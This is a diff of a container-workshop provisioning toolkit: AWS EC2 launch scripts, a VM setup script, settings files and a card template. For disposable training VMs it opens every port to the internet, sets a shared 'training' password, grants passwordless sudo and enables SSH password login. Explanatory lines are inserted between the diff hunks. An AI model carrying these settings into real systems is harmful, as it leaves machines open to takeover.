dockercoins/worker \
logstash \
prom/node-exporter \
google/cadvisor \
dockersamples/visualizer \
nathanleclaire/redisonrails; do
debian:latest \
ubuntu:latest \
fedora:latest \
centos:latest \
postgres \
redis \
training/namer \
nathanleclaire/redisonrails; do
sudo -u docker docker pull $I
done'
info "Finished pulling images for $TAG."
info "You may now want to run:"
info "$0 cards $TAG <settings/somefile.yaml>"
}
wait_until_tag_is_running() {
max_retry=50
TAG=$1
COUNT=$2
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
let "i += 1"
info "$(printf "%d/%d instances online" $done_count $COUNT)"
done_count=$(aws ec2 describe-instances \
--filters "Name=instance-state-name,Values=running" \
"Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].State.Name" \
| tr "\t" "\n" \
| wc -l)
if [[ $i -gt $max_retry ]]; then
die "Timed out while waiting for instance creation (after $max_retry retries)"
fi
sleep 1
done
}
tag_is_reachable() {
TAG=$1
need_tag $TAG
link_tag $TAG
pssh -t 5 true 2>&1 >/dev/null
}
test_tag() {
ips_file=tags/$TAG/ips.txt
info "Picking a random IP address in $ips_file to run tests."
ip=$(shuf -n1 $ips_file)
n=$((1 + $RANDOM % $(wc -l <$ips_file)))
ip=$(head -n $n $ips_file | tail -n 1)
test_vm $ip
info "Tests complete."
}
@@ -708,8 +435,8 @@ test_vm() {
for cmd in "hostname" \
"whoami" \
"hostname -i" \
"ls -l /usr/local/bin/i_am_first_node" \
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
"cat /tmp/node" \
"cat /tmp/ipv4" \
"cat /etc/hosts" \
"hostnamectl status" \
"docker version | grep Version -B1" \
@@ -769,3 +496,18 @@ sync_keys() {
info "Using existing key $AWS_KEY_NAME."
fi
}
get_token() {
if [ -z $USER ]; then
export USER=anonymous
fi
date +%Y-%m-%d-%H-%M-$USER
}
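For illustration, a token generated on 2020-04-07 at 16:48 by UNIX user jerome would come out as 2020-04-07-16-48-jerome (hypothetical values).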
describe_tag() {
# Display instance details and reachability/status information
TAG=$1
need_tag $TAG
aws_display_instances_by_tag $TAG
aws_display_instance_statuses_by_tag $TAG
}

@@ -1,30 +0,0 @@
# Default stub functions for infrastructure libraries.
# When loading an infrastructure library, these functions will be overridden.
infra_list() {
warning "infra_list is unsupported on $INFRACLASS."
}
infra_quotas() {
warning "infra_quotas is unsupported on $INFRACLASS."
}
infra_start() {
warning "infra_start is unsupported on $INFRACLASS."
}
infra_stop() {
warning "infra_stop is unsupported on $INFRACLASS."
}
infra_quotas() {
warning "infra_quotas is unsupported on $INFRACLASS."
}
infra_opensg() {
warning "infra_opensg is unsupported on $INFRACLASS."
}
infra_disableaddrchecks() {
warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
}

@@ -1,216 +0,0 @@
infra_list() {
aws_display_tags
}
infra_quotas() {
greet
max_instances=$(aws ec2 describe-account-attributes \
--attribute-names max-instances \
--query 'AccountAttributes[*][AttributeValues]')
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
info "Available regions:"
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
}
infra_start() {
COUNT=$1
# Print our AWS username, to ease the pain of credential-juggling
greet
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
key_name=$(sync_keys)
AMI=$(aws_get_ami) # Retrieve the AWS image ID
if [ -z "$AMI" ]; then
die "I could not find which AMI to use in this region. Try another region?"
fi
AWS_KEY_NAME=$(make_key_name)
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
sep "Starting instances"
info " Count: $COUNT"
info " Region: $AWS_DEFAULT_REGION"
info " Token/tag: $TAG"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
info " Instance type: $AWS_INSTANCE_TYPE"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
--instance-type $AWS_INSTANCE_TYPE \
--client-token $TAG \
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
--image-id $AMI)
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
info "Reservation ID: $reservation_id"
sep
# if instance creation succeeded, we should have some IDs
IDS=$(aws_get_instance_ids_by_client_token $TAG)
if [ -z "$IDS" ]; then
die "Instance creation failed."
fi
# Tag these new instances with a tag that is the same as the token
aws_tag_instances $TAG $TAG
# Wait until EC2 API tells us that the instances are running
wait_until_tag_is_running $TAG $COUNT
aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
}
infra_stop() {
aws_kill_instances_by_tag
}
infra_opensg() {
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol icmp \
--port -1 \
--cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol udp \
--port 0-65535 \
--cidr 0.0.0.0/0
aws ec2 authorize-security-group-ingress \
--group-name default \
--protocol tcp \
--port 0-65535 \
--cidr 0.0.0.0/0
}
infra_disableaddrchecks() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
for ID in $IDS; do
info "Disabling source/destination IP checks on: $ID"
aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
done
}
wait_until_tag_is_running() {
max_retry=100
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
let "i += 1"
info "$(printf "%d/%d instances online" $done_count $COUNT)"
done_count=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
"Name=instance-state-name,Values=running" \
--query "length(Reservations[].Instances[])")
if [[ $i -gt $max_retry ]]; then
die "Timed out while waiting for instance creation (after $max_retry retries)"
fi
sleep 1
done
}
aws_display_tags() {
# Print all "Name" tags in our region with their instance count
echo "[#] [Status] [Token] [Tag]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
aws ec2 describe-instances \
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
| tr -d "\r" \
| uniq -c \
| sort -k 3 \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}
aws_get_tokens() {
aws ec2 describe-instances --output text \
--query 'Reservations[*].Instances[*].[ClientToken]' \
| sort -u
}
aws_display_instance_statuses_by_tag() {
IDS=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
aws ec2 describe-instance-status \
--instance-ids $IDS \
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
--output table
}
aws_display_instances_by_tag() {
result=$(aws ec2 describe-instances --output table \
--filter "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].[ \
InstanceId, \
State.Name, \
Tags[0].Value, \
PublicIpAddress, \
InstanceType \
]"
)
if [[ -z $result ]]; then
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
else
echo "$result"
fi
}
aws_get_instance_ids_by_filter() {
FILTER=$1
aws ec2 describe-instances --filters $FILTER \
--query Reservations[*].Instances[*].InstanceId \
--output text | tr "\t" "\n" | tr -d "\r"
}
aws_get_instance_ids_by_client_token() {
TOKEN=$1
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}
aws_get_instance_ids_by_tag() {
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}
aws_get_instance_ips_by_tag() {
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
--output text \
--query "Reservations[*].Instances[*].PublicIpAddress" \
| tr "\t" "\n" \
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}
aws_kill_instances_by_tag() {
IDS=$(aws_get_instance_ids_by_tag $TAG)
if [ -z "$IDS" ]; then
die "Invalid tag."
fi
info "Deleting instances with tag $TAG."
aws ec2 terminate-instances --instance-ids $IDS \
| grep ^TERMINATINGINSTANCES
info "Deleted instances with tag $TAG."
}
aws_tag_instances() {
OLD_TAG_OR_TOKEN=$1
NEW_TAG=$2
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}
aws_get_ami() {
##VERSION##
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
}

@@ -1,8 +0,0 @@
infra_start() {
COUNT=$1
info "You should now run your provisioning commands for $COUNT machines."
info "Note: no machines have been automatically created!"
info "Once done, put the list of IP addresses in tags/$TAG/ips.txt"
info "(one IP address per line, without any comments or extra lines)."
touch tags/$TAG/ips.txt
}
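For instance, a hand-written tags/$TAG/ips.txt for three machines would look like this (addresses are illustrative, taken from the TEST-NET-3 documentation range):
203.0.113.10
203.0.113.11
203.0.113.12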

@@ -1,20 +0,0 @@
infra_start() {
COUNT=$1
cp terraform/*.tf tags/$TAG
(
cd tags/$TAG
terraform init
echo prefix = \"$TAG\" >> terraform.tfvars
echo count = \"$COUNT\" >> terraform.tfvars
terraform apply -auto-approve
terraform output ip_addresses > ips.txt
)
}
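Given the two echo lines above, the generated terraform.tfvars would contain something like this (values illustrative):
prefix = "2020-04-07-16-48-admin-test"
count = "4"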
infra_stop() {
(
cd tags/$TAG
terraform destroy -auto-approve
)
}

@@ -1,15 +1,20 @@
#!/usr/bin/env python3
#!/usr/bin/env python
import os
import sys
import yaml
import jinja2
def prettify(l):
l = [ip.strip() for ip in l]
ret = [ "node{}: <code>{}</code>".format(i+1, s) for (i, s) in zip(range(len(l)), l) ]
return ret
# Read settings from user-provided settings file
context = yaml.safe_load(open(sys.argv[1]))
SETTINGS = yaml.load(open(sys.argv[1]))
clustersize = SETTINGS["clustersize"]
ips = list(open("ips.txt"))
clustersize = context["clustersize"]
print("---------------------------------------------")
print(" Number of IPs: {}".format(len(ips)))
@@ -25,32 +30,21 @@ while ips:
ips = ips[clustersize:]
clusters.append(cluster)
context["clusters"] = clusters
template_file_name = context["cards_template"]
template_file_path = os.path.join(
os.path.dirname(__file__),
"..",
"templates",
template_file_name
)
template = jinja2.Template(open(template_file_path).read())
template_file_name = SETTINGS["cards_template"]
template = jinja2.Template(open(template_file_name).read())
with open("ips.html", "w") as f:
f.write(template.render(**context))
f.write(template.render(clusters=clusters, **SETTINGS))
print("Generated ips.html")
try:
import pdfkit
paper_size = context["paper_size"]
margin = {"A4": "0.5cm", "Letter": "0.2in"}[paper_size]
with open("ips.html") as f:
pdfkit.from_file(f, "ips.pdf", options={
"page-size": paper_size,
"margin-top": margin,
"margin-bottom": margin,
"margin-left": margin,
"margin-right": margin,
"page-size": SETTINGS["paper_size"],
"margin-top": SETTINGS["paper_margin"],
"margin-bottom": SETTINGS["paper_margin"],
"margin-left": SETTINGS["paper_margin"],
"margin-right": SETTINGS["paper_margin"],
})
print("Generated ips.pdf")
except ImportError:
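A rough invocation sketch for the card generator above, assuming the ips.txt symlink created by link_tag is present in the working directory (the settings path is only an example):
python3 scripts/ips-txt-to-html.py settings/somefile.yaml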

@@ -12,9 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
CLUSTER_SIZE = config["clustersize"]
CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]
#################################
@@ -47,7 +45,7 @@ def system(cmd):
# On EC2, the ephemeral disk might be mounted on /mnt.
# If /mnt is a mountpoint, place Docker workspace on it.
system("if mountpoint -q /mnt; then sudo mkdir -p /mnt/docker && sudo ln -sfn /mnt/docker /var/lib/docker; fi")
system("if mountpoint -q /mnt; then sudo mkdir /mnt/docker && sudo ln -s /mnt/docker /var/lib/docker; fi")
# Put our public IP in /tmp/ipv4
# ipv4_retrieval_endpoint = "http://169.254.169.254/latest/meta-data/public-ipv4"
@@ -56,24 +54,15 @@ system("curl --silent {} > /tmp/ipv4".format(ipv4_retrieval_endpoint))
ipv4 = open("/tmp/ipv4").read()
# Add a "docker" user with password coming from the settings
# Add a "docker" user with password "training"
system("id docker || sudo useradd -d /home/docker -m -s /bin/bash docker")
system("echo docker:{} | sudo chpasswd".format(DOCKER_USER_PASSWORD))
system("echo docker:training | sudo chpasswd")
# Fancy prompt courtesy of @soulshake.
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
export PS1='\e[1m\e[31m[{}] \e[32m(\\$(docker-prompt)) \e[34m\u@\h\e[35m \w\e[0m\n$ '
SQRL""".format(ipv4))
# Bigger history, in a different file, and saved before executing each command
system("""sudo -u docker tee -a /home/docker/.bashrc <<SQRL
export HISTSIZE=9999
export HISTFILESIZE=9999
shopt -s histappend
trap 'history -a' DEBUG
export HISTFILE=~/.history
SQRL""")
# Custom .vimrc
system("""sudo -u docker tee /home/docker/.vimrc <<SQRL
syntax on
@@ -82,29 +71,8 @@ set expandtab
set number
set shiftwidth=2
set softtabstop=2
set nowrap
SQRL""")
# Custom .tmux.conf
system(
"""sudo -u docker tee /home/docker/.tmux.conf <<SQRL
bind h select-pane -L
bind j select-pane -D
bind k select-pane -U
bind l select-pane -R
# Allow using mouse to switch panes
set -g mouse on
# Make scrolling with wheels work
bind -n WheelUpPane if-shell -F -t = "#{mouse_any_flag}" "send-keys -M" "if -Ft= '#{pane_in_mode}' 'send-keys -M' 'select-pane -t=; copy-mode -e; send-keys -M'"
bind -n WheelDownPane select-pane -t= \; send-keys -M
SQRL"""
)
# add docker user to sudoers and allow password authentication
system("""sudo tee /etc/sudoers.d/docker <<SQRL
docker ALL=(ALL) NOPASSWD:ALL
@@ -114,8 +82,7 @@ system("sudo sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/' /e
system("sudo service ssh restart")
system("sudo apt-get -q update")
system("sudo apt-get -qy install git jq")
system("sudo apt-get -qy install emacs-nox joe")
system("sudo apt-get -qy install git jq python-pip")
#######################
### DOCKER INSTALLS ###
@@ -130,6 +97,7 @@ system("sudo apt-get -q update")
system("sudo apt-get -qy install docker-ce")
### Install docker-compose
#system("sudo pip install -U docker-compose=={}".format(COMPOSE_VERSION))
system("sudo curl -sSL -o /usr/local/bin/docker-compose https://github.com/docker/compose/releases/download/{}/docker-compose-{}-{}".format(COMPOSE_VERSION, platform.system(), platform.machine()))
system("sudo chmod +x /usr/local/bin/docker-compose")
system("docker-compose version")
@@ -140,7 +108,7 @@ system("sudo chmod +x /usr/local/bin/docker-machine")
system("docker-machine version")
system("sudo apt-get remove -y --purge dnsmasq-base")
system("sudo apt-get -qy install python-setuptools pssh apache2-utils httping htop unzip mosh tree")
system("sudo apt-get -qy install python-setuptools pssh apache2-utils httping htop unzip mosh")
### Wait for Docker to be up.
### (If we don't do this, Docker will not be responsive during the next step.)
@@ -153,7 +121,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses
def makenames(addrs):
return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]
return [ "node%s"%(i+1) for i in range(len(addrs)) ]
while addresses:
cluster = addresses[:CLUSTER_SIZE]
@@ -167,21 +135,15 @@ while addresses:
print(cluster)
mynode = cluster.index(ipv4) + 1
system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
system("echo node{} | sudo tee /etc/hostname".format(mynode))
system("sudo hostname node{}".format(mynode))
system("sudo -u docker mkdir -p /home/docker/.ssh")
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")
# Create a convenience file to easily check if we're the first node
if ipv4 == cluster[0]:
system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
# On the first node, if we don't have a private key, generate one (with empty passphrase)
# If I'm node1 and don't have a private key, generate one (with empty passphrase)
system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
else:
system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
# Record the IPV4 and name of the first node
system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))
FINISH = time.time()
duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])
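The i_am_first_node symlink created above resolves to /bin/true on the first node and /bin/false everywhere else, so cluster-wide one-time steps can be guarded like this (a sketch; the echo is a placeholder):
if i_am_first_node; then
  echo "one-time cluster setup would run here"
fi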

@@ -1,17 +1,12 @@
# This file can be sourced in order to directly run commands on
# a group of VMs whose IPs are located in ips.txt of the directory in which
# a batch of VMs whose IPs are located in ips.txt of the directory in which
# the command is run.
pssh() {
if [ -z "$TAG" ]; then
>/dev/stderr echo "Variable \$TAG is not set."
return
fi
HOSTFILE="tags/$TAG/ips.txt"
HOSTFILE="ips.txt"
[ -f $HOSTFILE ] || {
>/dev/stderr echo "Hostfile $HOSTFILE not found."
>/dev/stderr echo "No hostfile found at $HOSTFILE"
return
}
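A minimal usage sketch of the sourcing pattern described in the header comment (the lib/pssh.sh path and the tag value are assumptions):
export TAG=2020-04-07-16-48-admin-test
. lib/pssh.sh
pssh 'docker version'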

@@ -1,42 +0,0 @@
<!DOCTYPE html>
<html>
<head>
<title>bash history</title>
<style>
#log {
font: bold 24px courier;
}
#log div:last-child {
background: yellow;
}
</style>
</head>
<body>
<div id="log"></div>
<script>
var ws = new WebSocket('ws://' + (location.host ? location.host : "localhost:8080") + "/");
var log = document.getElementById('log');
var echo = function(text) {
var line = document.createElement('div');
line.textContent = text;
log.appendChild(line);
line.scrollIntoView();
}
ws.onopen = function() {
document.body.style.backgroundColor = '#cfc';
};
ws.onclose = function() {
document.body.style.backgroundColor = '#fcc';
echo("Disconnected from server. Try to reload this page?");
};
ws.onmessage = function(event) {
echo(event.data);
};
</script>
</body>
</html>

@@ -1,49 +0,0 @@
#!/usr/bin/env python
import os
import requests
import yaml
# configurable stuff
domains_file = "../../plentydomains/domains.txt"
config_file = os.path.join(
os.environ["HOME"], ".config/gandi/config.yaml")
tag = "test"
apiurl = "https://dns.api.gandi.net/api/v5/domains"
# inferred stuff
domains = open(domains_file).read().split()
apikey = yaml.safe_load(open(config_file))["apirest"]["key"]
ips = open(f"tags/{tag}/ips.txt").read().split()
settings_file = f"tags/{tag}/settings.yaml"
clustersize = yaml.safe_load(open(settings_file))["clustersize"]
# now do the fucking work
while domains and ips:
domain = domains[0]
domains = domains[1:]
cluster = ips[:clustersize]
ips = ips[clustersize:]
print(f"{domain} => {cluster}")
zone = ""
node = 0
for ip in cluster:
node += 1
zone += f"@ 300 IN A {ip}\n"
zone += f"* 300 IN A {ip}\n"
zone += f"node{node} 300 IN A {ip}\n"
r = requests.put(
f"{apiurl}/{domain}/records",
headers={"x-api-key": apikey},
data=zone)
print(r.text)
#r = requests.get(
# f"{apiurl}/{domain}/records",
# headers={"x-api-key": apikey},
# )
if domains:
print(f"Good, we have {len(domains)} domains left.")
if ips:
print(f"Crap, we have {len(ips)} IP addresses left.")

@@ -1,23 +0,0 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: dmuc
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
image:

@@ -1,24 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: kubenet
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
clusternumber: 100
image:

@@ -1,24 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: kuberouter
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
clusternumber: 200
image:

@@ -1,23 +0,0 @@
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: test
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training
image:

@@ -1,8 +1,5 @@
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: clusters.csv

@@ -1,23 +0,0 @@
# customize your cluster size, your cards template, and the versions
# Number of VMs per cluster
clustersize: 5
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# This can be "test" or "stable"
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.13.0
# Password used to connect with the "docker user"
docker_user_password: training

@@ -3,21 +3,22 @@
# Number of VMs per cluster
clustersize: 1
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: stable
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.25.4
machine_version: 0.15.0
# Password used to connect with the "docker user"
docker_user_password: training
compose_version: 1.17.1
machine_version: 0.13.0

@@ -1,22 +0,0 @@
# Number of VMs per cluster
clustersize: 4
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.25.4
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

@@ -1,24 +0,0 @@
# 3 nodes for k8s 101 workshops
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.14.0
# Password used to connect with the "docker user"
docker_user_password: training

@@ -0,0 +1,24 @@
# This file is passed by trainer-cli to scripts/ips-txt-to-html.py
# Number of VMs per cluster
clustersize: 5
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)
# This can be "test" or "stable"
engine_version: test
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.17.1
machine_version: 0.13.0

@@ -1,23 +0,0 @@
# This file is passed by trainer-cli to scripts/ips-txt-to-html.py
# Number of VMs per cluster
clustersize: 3
# The hostname of each node will be clusterprefix + a number
clusterprefix: node
# Jinja2 template to use to generate ready-to-cut cards
cards_template: cards.html
# Use "Letter" in the US, and "A4" everywhere else
paper_size: Letter
# This can be "test" or "stable"
engine_version: stable
# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.24.1
machine_version: 0.15.0
# Password used to connect with the "docker user"
docker_user_password: training

@@ -1,80 +0,0 @@
#!/bin/sh
set -e
retry () {
N=$1
I=0
shift
while ! "$@"; do
I=$(($I+1))
if [ $I -gt $N ]; then
echo "FAILED, ABORTING"
exit 1
fi
echo "FAILED, RETRYING ($I/$N)"
done
}
export AWS_INSTANCE_TYPE=t3a.small
INFRA=infra/aws-eu-west-3
STUDENTS=2
PREFIX=$(date +%Y-%m-%d-%H-%M)
SETTINGS=admin-dmuc
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $STUDENTS
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl disabledocker $TAG
retry 5 ./workshopctl kubebins $TAG
./workshopctl cards $TAG
SETTINGS=admin-kubenet
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
retry 5 ./workshopctl disableaddrchecks $TAG
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl kubebins $TAG
./workshopctl cards $TAG
SETTINGS=admin-kuberouter
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
retry 5 ./workshopctl disableaddrchecks $TAG
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl kubebins $TAG
./workshopctl cards $TAG
#INFRA=infra/aws-us-west-1
export AWS_INSTANCE_TYPE=t3a.medium
SETTINGS=admin-test
TAG=$PREFIX-$SETTINGS
./workshopctl start \
--tag $TAG \
--infra $INFRA \
--settings settings/$SETTINGS.yaml \
--count $((3*$STUDENTS))
retry 5 ./workshopctl deploy $TAG
retry 5 ./workshopctl kube $TAG 1.15.9
./workshopctl cards $TAG

@@ -1,290 +0,0 @@
{#
The variables below can be customized here directly, or in your
settings.yaml file. Any variable in settings.yaml will be exposed
in here as well.
#}
{%- set url = url
| default("http://FIXME.container.training/") -%}
{%- set pagesize = pagesize
| default(9) -%}
{%- set lang = lang
| default("en") -%}
{%- set event = event
| default("training session") -%}
{%- set backside = backside
| default(False) -%}
{%- set image = image
| default("kube") -%}
{%- set clusternumber = clusternumber
| default(None) -%}
{%- if qrcode == True -%}
{%- set qrcode = "https://container.training/q" -%}
{%- elif qrcode -%}
{%- set qrcode = qrcode -%}
{%- endif -%}
{# You can also set img_bottom_src instead. #}
{%- set img_logo_src = {
"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
"kube": "https://avatars1.githubusercontent.com/u/13629408",
"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
}[image] -%}
{%- if lang == "en" and clustersize == 1 -%}
{%- set intro -%}
Here is the connection information to your very own
machine for this {{ event }}.
You can connect to this VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machine is:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clustersize != 1 -%}
{%- set intro -%}
Here is the connection information to your very own
cluster for this {{ event }}.
You can connect to each VM with any SSH client.
{%- endset -%}
{%- set listhead -%}
Your machines are:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize == 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
machine pour cette formation.
Vous pouvez vous connecter à cette machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresse IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" and clusterprefix != "node" -%}
{%- set intro -%}
Here is the connection information for the
<strong>{{ clusterprefix }}</strong> environment.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" and clustersize != 1 -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
cluster pour cette formation.
Vous pouvez vous connecter à chaque machine virtuelle
avec n'importe quel client SSH.
{%- endset -%}
{%- set listhead -%}
Adresses IP:
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
{% if paper_size == "A4" %}
@page {
size: A4; /* Change from the default size of A4 */
margin: 0.5cm; /* Set margin on each page */
}
body {
/* this is A4 minus 0.5cm margins */
width: 20cm;
height: 28.7cm;
}
{% elif paper_size == "Letter" %}
@page {
size: Letter;
margin: 0.2in;
}
body {
/* this is Letter minus 0.2in margins */
width: 8.6in;
height: 10.6in;
}
{% endif %}
body, table {
margin: 0;
padding: 0;
line-height: 1em;
